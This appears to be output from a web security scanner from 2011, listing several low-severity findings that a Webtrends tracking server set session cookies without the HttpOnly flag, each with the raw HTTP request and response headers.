6e70b27355305dbec3b2ec9625d59696dd9137f95cd6ff73f3c76bbaa1b93d5657373d49e9d30a0b575d3426702087fe8af18e895cb4ef97f86841c01ac6bbd11568a0123cabc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=AD5F4ED6969AD3FB638C73538B1B4B8B; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce8148891dfd4d9187a23abaa1d9c02dde9dd40970272f46bff78273ed8a9dbeb2e4719d47c18d9ff3ccec0b4ce0ee794a02eb94da378ffdcdeb1a4d77b6b9d3aef5fe7696e70b27355305dbec3b2ec9625d59696dd9137f95cd6ff73f3c76bbaa1b93d5657373d49e9d30a0b575d3426702087fe8af18e895cb4ef97f86841c01ac6bbd11568a0123cabc HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BF7780E003CE01313D85D5C6CF53E033

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 15:41:39 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=AD5F4ED6969AD3FB638C73538B1B4B8B; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 23025

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce9b559509e25dfcfbd4009bd0a6ab2fd99dc90968212c30d6909c49c7b7bc8e92cd4efa418cd8d6d7c0c61d01bfa3526d65ecd98f7eabf1e7fd57123a9d9eb4a9a5a135afe7073b1e411ed8ba394ff6540c0f3a2082352ad19978ec7c4215eebb15d7d7642621849e9a30aab127d2173507592feeec01faa3a625881da4921411f46bbd11568a039c7d6d

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=10D213871EB701B33BE9A6992DF90D28; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce9b559509e25dfcfbd4009bd0a6ab2fd99dc90968212c30d6909c49c7b7bc8e92cd4efa418cd8d6d7c0c61d01bfa3526d65ecd98f7eabf1e7fd57123a9d9eb4a9a5a135afe7073b1e411ed8ba394ff6540c0f3a2082352ad19978ec7c4215eebb15d7d7642621849e9a30aab127d2173507592feeec01faa3a625881da4921411f46bbd11568a039c7d6d HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=96E1638C7BDB082433E3C6C43599B744

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 15:41:20 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=10D213871EB701B33BE9A6992DF90D28; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 23025

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7439f22d3b9a815f9c722cfa485633f72f3f241d638b524ee2040125118e68eec2e1dc6251cb3c98fab04d25ff4b0fc2f4a99237ea729651afc8bd43ab33eb64c3735a7123a51f7c3fe768690b96b249ad8a9dba4b1630dafd95763f5c7cd88bc890992c71f509fcb147ed116d7e39538dcb714780e6528e17939bba6512ca7216825b4107315270a4b13f0bb9decdd2348b35ab7396cc57c0dab72997b533e4cefd6b1541152dd0837194b47ebb97b26ccd99434a9b4de64791e09ff725c36828bedc60270045b0e9a366fe0666763c333a7bf4d6f182de01e870aa4da3ac241ef3580fa887b63707fd1f08760186781c3ce2ba4ff601a680ee4e4085850f15c63808fe61b99fbd4d12244366a38287b3d1c3a63dfca027d4eb8c266b59d931a5912949c1f199b0505949c654a51a33b388b740ca72b85cb2f939d5f629fe8ed20e9af404b7b5768b113fbdfacc9ae56da069ff7ca4456e2ef2f31c7d4f257a6c51e3d613ed342195c996e327a6b94f79a125485519e934a35150c788f8b3bd3da9479dded12c188f4d5bac3136805876946bddd1cc700e208124b7afafecd34f58e50bad6a6de4a8b2c4adee0eac6ecf6c870c37639dfc72aa1cd58be713ced7b64b7b3f311c06085c4daf9ddb9202d2ef71bfb6a577153d406c4fb5876f3d3246c8daf24e4c091d96443ca4a09019c60f58e648a589b2b26504bc301673e38b69ff73d7d5035d2fac884e433eba4bf065941c143d32f3d984247caad289264b8f59f8a2344e686ed123520e0a61f0374e543b2de3a7b4a7c2b53dee03ef39017042d8e70f9dabb4e61fc05b1a78d4eceb27561348e5ca12f7d80ba9b92c56c53923d3d3f0629212075dbd905273501c825ccda6f31ce9e27f9029c01cb14d2a2aa6733302eb3ff57fdedcb4a041311ed28706378ab8e287be3f253f58020441c7b456c8e0d914a966d2aa08da9c763c0507dbceaf6213f21315956753ace6b9d24bb681a9d319d2b5556eab27a5394f676811baf5c1657894edacc6263b19def2927c7c0969c3ede4b531abe2ab22430dc2c51b55488c9e2ec3e023911831418779a9723f6bb5d4b12b6f42cb0dd8b9f842e193f464c788f29e0b9b2face51a36bc39e81c7ca7cc2483bc1c4c2cf51b0754493a6da88d231e07d9b5b6dd1f7afb5c5f313b50ae631e70aabdd13b93a504bf90780dadbbd0c638ad8c461240f162eafb149b7926e6a0a1be122958f23edbcd8b5b496c26cf5cda6a19dbacefb2f687a8b645956a7bbef426f43fc279ddd1ef32bacc859629f98df227570d4b6f91cf00f4ea6e

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=367B4F903A397F6235C1F2804D37ACB4; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7439f22d3b9a815f9c722cfa485633f72f3f241d638b524ee2040125118e68eec2e1dc6251cb3c98fab04d25ff4b0fc2f4a99237ea729651afc8bd43ab33eb64c3735a7123a51f7c3fe768690b96b249ad8a9dba4b1630dafd95763f5c7cd88bc890992c71f509fcb147ed116d7e39538dcb714780e6528e17939bba6512ca7216825b4107315270a4b13f0bb9decdd2348b35ab7396cc57c0dab72997b533e4cefd6b1541152dd0837194b47ebb97b26ccd99434a9b4de64791e09ff725c36828bedc60270045b0e9a366fe0666763c333a7bf4d6f182de01e870aa4da3ac241ef3580fa887b63707fd1f08760186781c3ce2ba4ff601a680ee4e4085850f15c63808fe61b99fbd4d12244366a38287b3d1c3a63dfca027d4eb8c266b59d931a5912949c1f199b0505949c654a51a33b388b740ca72b85cb2f939d5f629fe8ed20e9af404b7b5768b113fbdfacc9ae56da069ff7ca4456e2ef2f31c7d4f257a6c51e3d613ed342195c996e327a6b94f79a125485519e934a35150c788f8b3bd3da9479dded12c188f4d5bac3136805876946bddd1cc700e208124b7afafecd34f58e50bad6a6de4a8b2c4adee0eac6ecf6c870c37639dfc72aa1cd58be713ced7b64b7b3f311c06085c4daf9ddb9202d2ef71bfb6a577153d406c4fb5876f3d3246c8daf24e4c091d96443ca4a09019c60f58e648a589b2b26504bc301673e38b69ff73d7d5035d2fac884e433eba4bf065941c143d32f3d984247caad289264b8f59f8a2344e686ed123520e0a61f0374e543b2de3a7b4a7c2b53dee03ef39017042d8e70f9dabb4e61fc05b1a78d4eceb27561348e5ca12f7d80ba9b92c56c53923d3d3f0629212075dbd905273501c825ccda6f31ce9e27f9029c01cb14d2a2aa6733302eb3ff57fdedcb4a041311ed28706378ab8e287be3f253f58020441c7b456c8e0d914a966d2aa08da9c763c0507dbceaf6213f21315956753ace6b9d24bb681a9d319d2b5556eab27a5394f676811baf5c1657894edacc6263b19def2927c7c0969c3ede4b531abe2ab22430dc2c51b55488c9e2ec3e023911831418779a9723f6bb5d4b12b6f42cb0dd8b9f842e193f464c788f29e0b9b2face51a36bc39e81c7ca7cc2483bc1c4c2cf51b0754493a6da88d231e07d9b5b6dd1f7afb5c5f313b50ae631e70aabdd13b93a504bf90780dadbbd0c638ad8c461240f162eafb149b7926e6a0a1be122958f23edbcd8b5b496c26cf5cda6a19dbacefb2f687a8b645956a7bbef426f43fc279ddd1ef32bacc859629f98df227570d4b6f91cf00f4ea6e HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/en-au/netsolutionswa/casestudies.aspx?bladeFlyout=LocalePicker&SearchType=0&navIndex=2&hdrFo=mthdr02
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0B899B0C1CBB2BD7366E35AD2D5AA510

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 15:39:07 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=367B4F903A397F6235C1F2804D37ACB4; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 23025

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1e3b05f9a6f0b729a85efe7adb7fb8cf8eeb771dec2619c6e66228f7e802013802a70bf96b1c3ea19d97efe93fa6fb5ea74b545b1f6369884864c85e279fd5377162ab5cbea2665ceb2710c2aa521889f65cb9f85acd62a48c188452f8d5108fcdb073538598989008ca7f0ba4af4581f6d4a79c2f7c47cdcd7a2552be91b374aea6f476ccb905aa5a3d174e1a634cdb980d9d601c589313678623d87457b45e1f1e908c61532f25e3f94f63afa3f6db67e7007a14a6b7c710a8b5a35e27a0d4500847f80c0ebda463bc83a8189dd1d23b44666c6f0e2e2369b2e8a5dffca9a56c2278975ad05350150d5070b4c817a7105f1cc36df9be0da376750cc8ef217352a0ba380bf9a922864fe1d879913aa3b5d337305caf06e6482e85fb331c3d8ef5b24887216825952132a3d35aff60551fb92a69724812ffe64c7bc44d9cda7109fff75ecdefc7a580b5b015be0a2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=7DEDBED732B5F52046559E1D8EA46CE3; Path=/ots

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:37:39 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=7DEDBED732B5F52046559E1D8EA46CE3; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 5953
Connection: Keep-Alive

/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.1 2009-11-24 23:15:52 michae
...[SNIP]...

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ots.optimize.webtrends.com
Path:	/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0e5ba4847f3eed4beed5e6ab1b12de202e38127137a41acc581ec0fecd3a959a3a538fb2f660ff25ba0654719d4b6c01e1bf8a68d6d6e9ccccf2a0cd29ff193a3d1ad0b394d2f8f4242af9403a72af1a05e85d189bf9584ec2bff31a8183270fc598f5c0622dcbe5b6b6c3716d2cae6c3d77eb1fac20a35ebbc277e1aeeb742cd4298b473505e34b1f2b95f8c69253cd9c8e2e0fcafa4ecb5eeb972d0fb6d8c27392b8f1fe14354db7a22e4f3f981b902d46ff783e47cf9a720ab7f8ad51ef99c9e5cceaa79b91552041ad9a79a692b84e621103aca09edf9249ed2df83f71d59ccc62356fa5168f2ca0f3f315ffb890f88d686c03ff64f777d5e1bbf9db672ada4c41e75e97a7c7ecc5f7a55ffc64ec4e19639b7820eeab9c3979112afef38467e754391361e4e91e0fc13bf0049e4212e9f91559c63359c257a75a15c6b001172fe4937f705511341db39b094acc560169b6ac1d5ed1752b30b5cd5e8a69d429d698147daacb730cc29fc60d071411a29ce700554cc273d409ac55da6eb9eba491035a7fc9371495675d590c2e2ea0819f20efec52fbc6148654a40d0d5333cdee40bc237d290ef3a55ef0473ee3d3174415824f7e05046e588ffd272df35a074edad59ce95a73fdbfd338a84b97405441e3baacf2880b37eb38bc0